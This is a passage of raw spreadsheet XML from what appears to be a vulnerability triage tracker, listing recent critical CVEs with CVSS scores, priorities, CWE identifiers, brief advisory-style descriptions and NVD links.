sso-master v1.0.0 allows attackers to authenticate into the application without a password via sending a crafted POST request.</t></is></c><c r="T68" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79577</t></is></c></row><row r="69"><c r="A69" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B69" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C69" s="5" t="inlineStr"><is><t>CVE-2026-65669</t></is></c><c r="D69" s="5" t="n"><v>9.6</v></c><c r="E69" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F69" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G69" s="5" t="inlineStr" /><c r="H69" s="5" t="n"><v>0.007</v></c><c r="I69" s="5" t="inlineStr" /><c r="J69" s="5" t="inlineStr" /><c r="K69" s="5" t="inlineStr" /><c r="L69" s="5" t="inlineStr" /><c r="M69" s="5" t="inlineStr" /><c r="N69" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O69" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P69" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q69" s="5" t="inlineStr" /><c r="R69" s="5" t="inlineStr"><is><t>CWE-74</t></is></c><c r="S69" s="5" t="inlineStr"><is><t>Improper neutralization of special elements in output used by a downstream component ('injection') in SQL Server allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T69" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-65669</t></is></c></row><row r="70"><c r="A70" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B70" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C70" s="5" t="inlineStr"><is><t>CVE-2026-81376</t></is></c><c r="D70" s="5" t="n"><v>9.6</v></c><c r="E70" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F70" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G70" s="5" t="inlineStr" /><c r="H70" s="5" t="n"><v>0.006</v></c><c r="I70" s="5" t="inlineStr" /><c r="J70" s="5" t="inlineStr" /><c r="K70" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L70" s="5" t="inlineStr" /><c r="M70" s="5" t="inlineStr" /><c r="N70" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O70" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P70" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q70" s="5" t="inlineStr" /><c r="R70" s="5" t="inlineStr"><is><t>CWE-1023, CWE-693</t></is></c><c r="S70" s="5" t="inlineStr"><is><t>Incomplete comparison with missing factors in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T70" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81376</t></is></c></row><row r="71"><c r="A71" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B71" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C71" s="5" t="inlineStr"><is><t>CVE-2026-76969</t></is></c><c r="D71" s="5" t="n"><v>9.4</v></c><c r="E71" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F71" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G71" s="5" t="inlineStr" /><c r="H71" s="5" t="n"><v>0.003</v></c><c r="I71" s="5" t="inlineStr" /><c r="J71" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K71" s="5" t="inlineStr" /><c r="L71" s="5" t="inlineStr" /><c r="M71" s="5" t="inlineStr" /><c r="N71" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O71" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P71" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q71" s="5" t="inlineStr" /><c r="R71" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S71" s="5" t="inlineStr"><is><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is></c><c r="T71" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76969</t></is></c></row><row r="72"><c r="A72" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B72" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C72" s="5" t="inlineStr"><is><t>CVE-2026-82533</t></is></c><c r="D72" s="5" t="n"><v>9.4</v></c><c r="E72" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F72" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G72" s="5" t="inlineStr" /><c r="H72" s="5" t="n"><v>0.006</v></c><c r="I72" s="5" t="inlineStr" /><c r="J72" s="5" t="inlineStr" /><c r="K72" s="5" t="inlineStr" /><c r="L72" s="5" t="inlineStr" /><c r="M72" s="5" t="inlineStr" /><c r="N72" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O72" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P72" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q72" s="5" t="inlineStr" /><c r="R72" s="5" t="inlineStr"><is><t>CWE-807</t></is></c><c r="S72" s="5" t="inlineStr"><is><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is></c><c r="T72" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82533</t></is></c></row><row r="73"><c r="A73" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B73" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C73" s="5" t="inlineStr"><is><t>CVE-2026-62645</t></is></c><c r="D73" s="5" t="n"><v>9.300000000000001</v></c><c r="E73" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F73" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G73" s="5" t="inlineStr" /><c r="H73" s="5" t="n"><v>0.003</v></c><c r="I73" s="5" t="inlineStr" /><c r="J73" s="5" t="inlineStr" /><c r="K73" s="5" t="inlineStr" /><c r="L73" s="5" t="inlineStr" /><c r="M73" s="5" t="inlineStr" /><c r="N73" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O73" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P73" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q73" s="5" t="inlineStr" /><c r="R73" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S73" s="5" t="inlineStr"><is><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is></c><c r="T73" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62645</t></is></c></row><row r="74"><c r="A74" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B74" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C74" s="5" t="inlineStr"><is><t>CVE-2026-62647</t></is></c><c r="D74" s="5" t="n"><v>9.300000000000001</v></c><c r="E74" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F74" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G74" s="5" t="inlineStr" /><c r="H74" s="5" t="n"><v>0.003</v></c><c r="I74" s="5" t="inlineStr" /><c r="J74" s="5" t="inlineStr" /><c r="K74" s="5" t="inlineStr" /><c r="L74" s="5" t="inlineStr" /><c r="M74" s="5" t="inlineStr" /><c r="N74" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O74" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P74" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q74" s="5" t="inlineStr" /><c r="R74" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S74" s="5" t="inlineStr"><is><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is></c><c r="T74" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62647</t></is></c></row><row r="75"><c r="A75" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B75" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C75" s="5" t="inlineStr"><is><t>CVE-2026-69356</t></is></c><c r="D75" s="5" t="n"><v>9.300000000000001</v></c><c r="E75" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F75" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G75" s="5" t="inlineStr" /><c r="H75" s="5" t="n"><v>0.007</v></c><c r="I75" s="5" t="inlineStr" /><c r="J75" s="5" t="inlineStr" /><c r="K75" s="5" t="inlineStr" /><c r="L75" s="5" t="inlineStr" /><c r="M75" s="5" t="inlineStr" /><c r="N75" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O75" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P75" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q75" s="5" t="inlineStr" /><c r="R75" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S75" s="5" t="inlineStr"><is><t>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Exchange Server allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T75" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69356</t></is></c></row><row r="76"><c r="A76" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B76" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C76" s="5" t="inlineStr"><is><t>CVE-2026-76200</t></is></c><c r="D76" s="5" t="n"><v>9.300000000000001</v></c><c r="E76" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F76" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G76" s="5" t="inlineStr" /><c r="H76" s="5" t="n"><v>0.005</v></c><c r="I76" s="5" t="inlineStr" /><c r="J76" s="5" t="inlineStr" /><c r="K76" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L76" s="5" t="inlineStr" /><c r="M76" s="5" t="inlineStr" /><c r="N76" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O76" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P76" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q76" s="5" t="inlineStr" /><c r="R76" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S76"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T76" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76200</t></is></c></row><row r="77"><c r="A77" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B77" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C77" s="5" t="inlineStr"><is><t>CVE-2026-76201</t></is></c><c r="D77" s="5" t="n"><v>9.300000000000001</v></c><c r="E77" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F77" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G77" s="5" t="inlineStr" /><c r="H77" s="5" t="n"><v>0.005</v></c><c r="I77" s="5" t="inlineStr" /><c r="J77" s="5" t="inlineStr" /><c r="K77" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L77" s="5" t="inlineStr" /><c r="M77" s="5" t="inlineStr" /><c r="N77" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O77" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P77" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q77" s="5" t="inlineStr" /><c r="R77" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S77"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T77" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76201</t></is></c></row><row r="78"><c r="A78" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B78" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C78" s="5" t="inlineStr"><is><t>CVE-2026-78997</t></is></c><c r="D78" s="5" t="n"><v>9.300000000000001</v></c><c r="E78" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F78" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G78" s="5" t="inlineStr" /><c r="H78" s="5" t="n"><v>0.003</v></c><c r="I78" s="5" t="inlineStr" /><c r="J78" s="5" t="inlineStr" /><c r="K78" s="5" t="inlineStr" /><c r="L78" s="5" t="inlineStr" /><c r="M78" s="5" t="inlineStr" /><c r="N78" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O78" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P78" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q78" s="5" t="inlineStr" /><c r="R78" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S78" s="5" t="inlineStr"><is><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is></c><c r="T78" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78997</t></is></c></row><row r="79"><c r="A79" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B79" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C79" s="5" t="inlineStr"><is><t>CVE-2026-67367</t></is></c><c r="D79" s="5" t="n"><v>9.199999999999999</v></c><c r="E79" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F79" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G79" s="5" t="inlineStr" /><c r="H79" s="5" t="n"><v>0.008</v></c><c r="I79" s="5" t="inlineStr" /><c r="J79" s="5" t="inlineStr" /><c r="K79" s="5" t="inlineStr" /><c r="L79" s="5" t="inlineStr" /><c r="M79" s="5" t="inlineStr" /><c r="N79" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O79" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P79" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q79" s="5" t="inlineStr" /><c r="R79" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="S79" s="5" t="inlineStr"><is><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is></c><c r="T79" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67367</t></is></c></row><row r="80"><c r="A80" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B80" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C80" s="5" t="inlineStr"><is><t>CVE-2026-82067</t></is></c><c r="D80" s="5" t="n"><v>9.199999999999999</v></c><c r="E80" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F80" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G80" s="5" t="inlineStr" /><c r="H80" s="5" t="n"><v>0.003</v></c><c r="I80" s="5" t="inlineStr" /><c r="J80" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K80" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L80" s="5" t="inlineStr" /><c r="M80" s="5" t="inlineStr" /><c r="N80" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O80" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P80" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q80" s="5" t="inlineStr" /><c r="R80" s="5" t="inlineStr"><is><t>CWE-178</t></is></c><c r="S80" s="5" t="inlineStr"><is><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is></c><c r="T80" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82067</t></is></c></row><row r="81"><c r="A81" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B81" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C81" s="5" t="inlineStr"><is><t>CVE-2026-84197</t></is></c><c r="D81" s="5" t="n"><v>9.199999999999999</v></c><c r="E81" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F81" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G81" s="5" t="inlineStr" /><c r="H81" s="5" t="n"><v>0.002</v></c><c r="I81" s="5" t="inlineStr" /><c r="J81" s="5" t="inlineStr" /><c r="K81" s="5" t="inlineStr" /><c r="L81" s="5" t="inlineStr" /><c r="M81" s="5" t="inlineStr" /><c r="N81" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O81" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P81" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q81" s="5" t="inlineStr" /><c r="R81" s="5" t="inlineStr"><is><t>CWE-295, CWE-297, CWE-300</t></is></c><c r="S81" s="5" t="inlineStr"><is><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is></c><c r="T81" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84197</t></is></c></row><row r="82"><c r="A82" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B82" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C82" s="5" t="inlineStr"><is><t>CVE-2026-62646</t></is></c><c r="D82" s="5" t="n"><v>9.1</v></c><c r="E82" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F82" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G82" s="5" t="inlineStr" /><c r="H82" s="5" t="n"><v>0.003</v></c><c r="I82" s="5" t="inlineStr" /><c r="J82" s="5" t="inlineStr" /><c r="K82" s="5" t="inlineStr" /><c r="L82" s="5" t="inlineStr" /><c r="M82" s="5" t="inlineStr" /><c r="N82" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O82" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P82" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q82" s="5" t="inlineStr" /><c r="R82" s="5" t="inlineStr"><is><t>CWE-331</t></is></c><c r="S82" s="5" t="inlineStr"><is><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is></c><c r="T82" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62646</t></is></c></row><row r="83"><c r="A83" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B83" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C83" s="5" t="inlineStr"><is><t>CVE-2026-69641</t></is></c><c r="D83" s="5" t="n"><v>9.1</v></c><c r="E83" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F83" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G83" s="5" t="inlineStr" /><c r="H83" s="5" t="n"><v>0.008</v></c><c r="I83" s="5" t="inlineStr" /><c r="J83" s="5" t="inlineStr" /><c r="K83" s="5" t="inlineStr" /><c r="L83" s="5" t="inlineStr" /><c r="M83" s="5" t="inlineStr" /><c r="N83" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O83" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P83" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q83" s="5" t="inlineStr" /><c r="R83" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S83" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="T83" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69641</t></is></c></row><row r="84"><c r="A84" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B84" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C84" s="5" t="inlineStr"><is><t>CVE-2026-73309</t></is></c><c r="D84" s="5" t="n"><v>9.1</v></c><c r="E84" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F84" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G84" s="5" t="inlineStr" /><c r="H84" s="5" t="n"><v>0.005</v></c><c r="I84" s="5" t="inlineStr" /><c r="J84" s="5" t="inlineStr" /><c r="K84" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L84" s="5" t="inlineStr" /><c r="M84" s="5" t="inlineStr" /><c r="N84" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O84" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P84" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q84" s="5" t="inlineStr" /><c r="R84" s="5" t="inlineStr"><is><t>CWE-697</t></is></c><c r="S84" s="5" t="inlineStr"><is><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is></c><c r="T84" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73309</t></is></c></row><row r="85"><c r="A85" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B85" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C85" s="5" t="inlineStr"><is><t>CVE-2026-73311</t></is></c><c r="D85" s="5" t="n"><v>9.1</v></c><c r="E85" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F85" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G85" s="5" t="inlineStr" /><c r="H85" s="5" t="n"><v>0.004</v></c><c r="I85" s="5" t="inlineStr" /><c r="J85" s="5" t="inlineStr" /><c r="K85" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L85" s="5" t="inlineStr" /><c r="M85" s="5" t="inlineStr" /><c r="N85" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O85" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P85" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q85" s="5" t="inlineStr" /><c r="R85" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="S85" s="5" t="inlineStr"><is><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is></c><c r="T85" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73311</t></is></c></row><row r="86"><c r="A86" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B86" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C86" s="5" t="inlineStr"><is><t>CVE-2026-73312</t></is></c><c r="D86" s="5" t="n"><v>9.1</v></c><c r="E86" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F86" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G86" s="5" t="inlineStr" /><c r="H86" s="5" t="n"><v>0.004</v></c><c r="I86" s="5" t="inlineStr" /><c r="J86" s="5" t="inlineStr" /><c r="K86" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L86" s="5" t="inlineStr" /><c r="M86" s="5" t="inlineStr" /><c r="N86" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O86" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P86" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q86" s="5" t="inlineStr" /><c r="R86" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="S86" s="5" t="inlineStr"><is><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is></c><c r="T86" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73312</t></is></c></row><row r="87"><c r="A87" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B87" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C87" s="5" t="inlineStr"><is><t>CVE-2026-75156</t></is></c><c r="D87" s="5" t="n"><v>9.1</v></c><c r="E87" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F87" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G87" s="5" t="inlineStr" /><c r="H87" s="5" t="n"><v>0.002</v></c><c r="I87" s="5" t="inlineStr" /><c r="J87" s="5" t="inlineStr" /><c r="K87" s="5" t="inlineStr" /><c r="L87" s="5" t="inlineStr" /><c r="M87" s="5" t="inlineStr" /><c r="N87" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O87" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P87" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q87" s="5" t="inlineStr" /><c r="R87" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="S87" s="5" t="inlineStr"><is><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is></c><c r="T87" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75156</t></is></c></row><row r="88"><c r="A88" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B88" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C88" s="5" t="inlineStr"><is><t>CVE-2026-75746</t></is></c><c r="D88" s="5" t="n"><v>9.1</v></c><c r="E88" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F88" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G88" s="5" t="inlineStr" /><c r="H88" s="5" t="n"><v>0.011</v></c><c r="I88" s="5" t="inlineStr" /><c r="J88" s="5" t="inlineStr" /><c r="K88" s="5" t="inlineStr" /><c r="L88" s="5" t="inlineStr" /><c r="M88" s="5" t="inlineStr" /><c r="N88" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O88" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P88" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q88" s="5" t="inlineStr" /><c r="R88" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S88" s="5" t="inlineStr"><is><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is></c><c r="T88" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75746</t></is></c></row><row r="89"><c r="A89" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B89" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C89" s="5" t="inlineStr"><is><t>CVE-2026-79571</t></is></c><c r="D89" s="5" t="n"><v>9.1</v></c><c r="E89" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F89" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G89" s="5" t="inlineStr" /><c r="H89" s="5" t="n"><v>0.003</v></c><c r="I89" s="5" t="inlineStr" /><c r="J89" s="5" t="inlineStr"><is><t>spring</t></is></c><c r="K89" s="5" t="inlineStr" /><c r="L89" s="5" t="inlineStr" /><c r="M89" s="5" t="inlineStr" /><c r="N89" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O89" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P89" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q89" s="5" t="inlineStr" /><c r="R89" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S89" s="5" t="inlineStr"><is><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is></c><c r="T89" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79571</t></is></c></row><row r="90"><c r="A90" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B90" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C90" s="5" t="inlineStr"><is><t>CVE-2026-86729</t></is></c><c r="D90" s="5" t="n"><v>9.1</v></c><c r="E90" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F90" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G90" s="5" t="inlineStr" /><c r="H90" s="5" t="n"><v>0.002</v></c><c r="I90" s="5" t="inlineStr" /><c r="J90" s="5" t="inlineStr" /><c r="K90" s="5" t="inlineStr" /><c r="L90" s="5" t="inlineStr" /><c r="M90" s="5" t="inlineStr" /><c r="N90" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O90" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P90" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q90" s="5" t="inlineStr" /><c r="R90" s="5" t="inlineStr"><is><t>CWE-307</t></is></c><c r="S90" s="5" t="inlineStr"><is><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is></c><c r="T90" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86729</t></is></c></row><row r="91"><c r="A91" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B91" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C91" s="5" t="inlineStr"><is><t>CVE-2026-86840</t></is></c><c r="D91" s="5" t="n"><v>9.1</v></c><c r="E91" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F91" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G91" s="5" t="inlineStr" /><c r="H91" s="5" t="n"><v>0.002</v></c><c r="I91" s="5" t="inlineStr" /><c r="J91" s="5" t="inlineStr" /><c r="K91" s="5" t="inlineStr" /><c r="L91" s="5" t="inlineStr" /><c r="M91" s="5" t="inlineStr" /><c r="N91" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O91" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P91" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q91" s="5" t="inlineStr" /><c r="R91" s="5" t="inlineStr"><is><t>CWE-639, CWE-862</t></is></c><c r="S91" s="5" t="inlineStr"><is><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is></c><c r="T91" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86840</t></is></c></row><row r="92"><c r="A92" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B92" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C92" s="5" t="inlineStr"><is><t>CVE-2026-53581</t></is></c><c r="D92" s="5" t="n"><v>9</v></c><c r="E92" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F92" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G92" s="5" t="inlineStr" /><c r="H92" s="5" t="n"><v>0.003</v></c><c r="I92" s="5" t="inlineStr" /><c r="J92" s="5" t="inlineStr" /><c r="K92" s="5" t="inlineStr" /><c r="L92" s="5" t="inlineStr" /><c r="M92" s="5" t="inlineStr" /><c r="N92" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O92" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P92" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q92" s="5" t="inlineStr" /><c r="R92" s="5" t="inlineStr"><is><t>CWE-22, 